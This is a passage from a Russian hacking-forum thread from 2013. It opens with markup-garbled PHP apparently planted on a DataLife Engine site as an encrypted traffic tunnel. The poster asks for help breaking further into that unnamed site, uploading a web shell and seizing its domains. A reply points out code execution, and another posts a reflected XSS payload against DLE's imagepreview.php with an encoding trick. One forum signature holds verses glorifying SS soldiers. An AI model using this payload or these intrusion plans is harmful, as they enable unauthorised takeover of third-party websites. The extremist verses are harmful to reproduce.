fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$rBuffLen[/COLOR][COLOR="#DD0000"])) { if (vpsp_enc) { fwrite([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"], VC_Decrypt([/COLOR][COLOR="#0000BB"]$wbuffer[/COLOR][COLOR="#DD0000"])); } else { fwrite([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$wbuffer[/COLOR][COLOR="#DD0000"]); } } fflush([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]); while ([/COLOR][COLOR="#0000BB"]$rbuffer[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$sBuffLen[/COLOR][COLOR="#DD0000"])) { if (vpsp_enc) { echo VC_Encrypt([/COLOR][COLOR="#0000BB"]$rbuffer[/COLOR][COLOR="#DD0000"]); } else { echo[/COLOR][COLOR="#0000BB"]$rbuffer[/COLOR][COLOR="#DD0000"]; } } fflush([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]); fclose([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]); exit; } function MD5Hash([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#DD0000"]) {[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#DD0000"]= md5([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#DD0000"]);[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]= ''; foreach(explode("[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]", trim(chunk_split([/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#DD0000"], 2))) as[/COLOR][COLOR="#0000BB"]$h[/COLOR][COLOR="#DD0000"]) {[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"].= chr(hexdec([/COLOR][COLOR="#0000BB"]$h[/COLOR][COLOR="#DD0000"])); } return[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]; } function VC_Init([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$ks[/COLOR][COLOR="#DD0000"]) {[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]= range(0, 255); if (strlen([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"]) == 0) { return[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]; }[/COLOR][COLOR="#0000BB"]$km[/COLOR][COLOR="#DD0000"]= MD5Hash([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"]);[/COLOR][COLOR="#0000BB"]$kx[/COLOR][COLOR="#DD0000"]= ''; for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#DD0000"]= 0;[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#DD0000"]Datalife Engine not installed. Please run install.php[/COLOR][/COLOR]
что можно из этого взять и можно ли доломать этот сайт и залить шелл? тиц сайта 50, может еще там есть вкусные домены, кто может помочь, желательно в личку что бы не разводить флуд?
Что за сайт пока не скажу, посмотрю живая ли тема и есть ли реальные мысли |
|
|
|
03.06.2013, 19:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Martyn911, судя по всему уже кто-то пытается воткнуть какой-то код ))
Если посмотрите на вывод, обнаружите code execution.
|
|
|
|
18.06.2013, 00:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Ответ:удалились
Решение: /threadedpost3522832.html Задай вопрос тут
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
17.07.2013, 21:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
2022
Репутация:
0
|
|
Нашел пассивную XSS.
Код:
Code:
http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]
Заменяем все специальные символы на \x[HEX код символа].
Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю. |
|
|
|
12.08.2013, 16:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
210
Репутация:
0
|
|
Сообщение от Martyn911
Martyn911 said:
Здравствуйте, есть дле сайт, при заходе на главнуюю выводит такое
что можно из этого взять и можно ли доломать этот сайт и залить шелл? тиц сайта 50, может еще там есть вкусные домены, кто может помочь, желательно в личку что бы не разводить флуд?
Что за сайт пока не скажу, посмотрю живая ли тема и есть ли реальные мысли
А что вы хотите из этого получить? Завтра снесут эту гадость и поставят что-то новое...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
